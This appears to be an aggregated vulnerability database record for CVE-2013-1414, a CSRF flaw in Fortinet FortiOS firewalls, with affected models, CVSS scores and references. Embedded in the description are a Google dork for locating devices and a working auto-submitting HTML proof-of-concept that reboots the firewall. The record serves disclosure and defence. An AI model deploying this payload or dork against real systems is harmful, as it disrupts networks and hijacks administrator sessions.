ID

VAR-201307-0030


CVE

CVE-2013-1414


TITLE

Fortinet FortiGate Runs on the device FortiOS Vulnerable to cross-site request forgery

Trust: 0.8

sources: JVNDB: JVNDB-2013-003232

DESCRIPTION

Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414 Vulnerability Type: CSRF (Cross-Site Request Forgery) Product: All Fortigate Firewalls Vendor: Fortinet http://www.fortinet.com Vulnerable Version: < 4.3.13 & < 5.0.2 Description ========== Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. Requirements =========== An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. Report-Timeline: ================ Vendor Notification: 11 July 2012 Vendor released version 5.0.2 / 18 March 2013 Vendor released version 4.3.13 / 29 April 2013 Status: Fixed Google Dork: ========== -english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser" Credit: ===== Sven Wurth dos@net-war.de PoC ==== This Example will reboot a Fortinet Firewall. This is just one of many possibilities to attack this vulnerability. ##### CSRF - Proof Of Concept #### <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post"> <input type="hidden" name="reason" value=""> <input type="hidden" name="action" value="1"> <input type="submit" name="add" value="rebootme"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> ##### End Poc #####

Trust: 2.07

sources: NVD: CVE-2013-1414 // JVNDB: JVNDB-2013-003232 // BID: 60861 // VULHUB: VHN-61416 // PACKETSTORM: 122216

AFFECTED PRODUCTS

vendor:fortinetmodel:fortiosscope:eqversion:5.0.1

Trust: 1.9

vendor:fortinetmodel:fortiosscope:eqversion:5.0

Trust: 1.9

vendor:fortinetmodel:fortiosscope:eqversion:4.3.10

Trust: 1.6

vendor:fortinetmodel:fortiosscope:eqversion:5.0.2

Trust: 1.1

vendor:fortinetmodel:fortigate-3810ascope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-600cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-110cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-310bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-20cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-voice-80cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigaterugged-100cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-3040bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-620bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-300cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-1000cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-5001a-swscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-100dscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-200bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-800cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-60cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-5060scope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-5020scope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-5001bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-50bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-3950bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-3140bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-1240bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortiosscope:lteversion:4.3.12

Trust: 1.0

vendor:fortinetmodel:fortigate-5101cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-3240cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-40cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-5140bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-80cscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-311bscope:eqversion: -

Trust: 1.0

vendor:fortinetmodel:fortigate-110cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-1240bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-300cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-3140bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-600cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-100dscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-3950bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-200bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-1000cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-5020scope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-5001a-swscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-620bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-50bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-3240cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-20cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-3040bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-800cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-80cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortiosscope:ltversion:5.x

Trust: 0.8

vendor:fortinetmodel:fortigate-5060scope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-voice-80cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-310bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-3810ascope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-5101cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-5001bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-40cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-311bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-60cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate rugged-100cscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortigate-5140bscope: - version: -

Trust: 0.8

vendor:fortinetmodel:fortiosscope:eqversion:4.3.12

Trust: 0.6

vendor:fortinetmodel:fortios b0630scope:eqversion:4.3.8

Trust: 0.3

vendor:fortinetmodel:fortios b0537scope:eqversion:4.3.8

Trust: 0.3

vendor:fortinetmodel:fortiosscope:eqversion:4.3.8

Trust: 0.3

vendor:fortinetmodel:fortios b064scope:eqversion:5.0

Trust: 0.3

vendor:fortinetmodel:fortigate-60cscope:eqversion:4.0

Trust: 0.3

vendor:fortinetmodel:fortigate-100dscope:eqversion:5.0

Trust: 0.3

vendor:fortinetmodel:fortigate-1000scope:eqversion:3.00

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:4.3.6

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:4.3.5

Trust: 0.3

vendor:fortinetmodel:fortigate 800fscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:800

Trust: 0.3

vendor:fortinetmodel:fortigate 620bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 60mscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:60

Trust: 0.3

vendor:fortinetmodel:fortigate 50amscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 50ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 500ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:5000

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:500

Trust: 0.3

vendor:fortinetmodel:fortigate 400ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:4000

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:400

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:3950

Trust: 0.3

vendor:fortinetmodel:fortigate 3810ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 3600ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:3600

Trust: 0.3

vendor:fortinetmodel:fortigate 311bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 310bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 3016bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 300ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:3000

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:300

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:3.00

Trust: 0.3

vendor:fortinetmodel:fortigate 224bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 200bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 200ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:200

Trust: 0.3

vendor:fortinetmodel:fortigate 1240bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 100ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 1000afa2scope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 1000ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:1000

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:100

Trust: 0.3

vendor:fortinetmodel:fortiosscope:neversion:5.0.3

Trust: 0.3

vendor:fortinetmodel:fortiosscope:neversion:4.3.13

Trust: 0.3

sources: BID: 60861 // JVNDB: JVNDB-2013-003232 // CNNVD: CNNVD-201307-116 // NVD: CVE-2013-1414

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-1414
value: MEDIUM

Trust: 1.0

NVD: CVE-2013-1414
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201307-116
value: MEDIUM

Trust: 0.6

VULHUB: VHN-61416
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2013-1414
severity: MEDIUM
baseScore: 5.1
vectorString: AV:N/AC:H/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 4.9
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-61416
severity: MEDIUM
baseScore: 5.1
vectorString: AV:N/AC:H/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 4.9
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-61416 // JVNDB: JVNDB-2013-003232 // CNNVD: CNNVD-201307-116 // NVD: CVE-2013-1414

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.9

sources: VULHUB: VHN-61416 // JVNDB: JVNDB-2013-003232 // NVD: CVE-2013-1414

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201307-116

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201307-116

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-003232

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-61416

PATCH

title:FortiGateアプライアンスurl:http://www.fortinet.co.jp/products/fortigate/

Trust: 0.8

sources: JVNDB: JVNDB-2013-003232

EXTERNAL IDS

db:NVDid:CVE-2013-1414

Trust: 2.9

db:EXPLOIT-DBid:26528

Trust: 1.7

db:JVNDBid:JVNDB-2013-003232

Trust: 0.8

db:CNNVDid:CNNVD-201307-116

Trust: 0.7

db:BIDid:60861

Trust: 0.4

db:PACKETSTORMid:122216

Trust: 0.2

db:SEEBUGid:SSVID-80159

Trust: 0.1

db:VULHUBid:VHN-61416

Trust: 0.1

sources: VULHUB: VHN-61416 // BID: 60861 // JVNDB: JVNDB-2013-003232 // PACKETSTORM: 122216 // CNNVD: CNNVD-201307-116 // NVD: CVE-2013-1414

REFERENCES

url:http://www.exploit-db.com/exploits/26528/

Trust: 1.7

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1414

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1414

Trust: 0.8

url:https://www.fortinet.com/

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2013-1414

Trust: 0.1

url:http://www.fortinet.com

Trust: 0.1

url:https://###_victim_ip_###/system/maintenance/shutdown"

Trust: 0.1

sources: VULHUB: VHN-61416 // BID: 60861 // JVNDB: JVNDB-2013-003232 // PACKETSTORM: 122216 // CNNVD: CNNVD-201307-116 // NVD: CVE-2013-1414

CREDITS

Sven Wurth

Trust: 0.4

sources: BID: 60861 // PACKETSTORM: 122216

SOURCES

db:VULHUBid:VHN-61416
db:BIDid:60861
db:JVNDBid:JVNDB-2013-003232
db:PACKETSTORMid:122216
db:CNNVDid:CNNVD-201307-116
db:NVDid:CVE-2013-1414

LAST UPDATE DATE

2024-08-14T14:34:19.704000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-61416date:2013-07-08T00:00:00
db:BIDid:60861date:2013-06-28T00:00:00
db:JVNDBid:JVNDB-2013-003232date:2013-07-09T00:00:00
db:CNNVDid:CNNVD-201307-116date:2013-07-09T00:00:00
db:NVDid:CVE-2013-1414date:2013-07-08T17:55:02.783

SOURCES RELEASE DATE

db:VULHUBid:VHN-61416date:2013-07-08T00:00:00
db:BIDid:60861date:2013-06-28T00:00:00
db:JVNDBid:JVNDB-2013-003232date:2013-07-09T00:00:00
db:PACKETSTORMid:122216date:2013-06-28T22:13:39
db:CNNVDid:CNNVD-201307-116date:2013-07-09T00:00:00
db:NVDid:CVE-2013-1414date:2013-07-08T17:55:02.783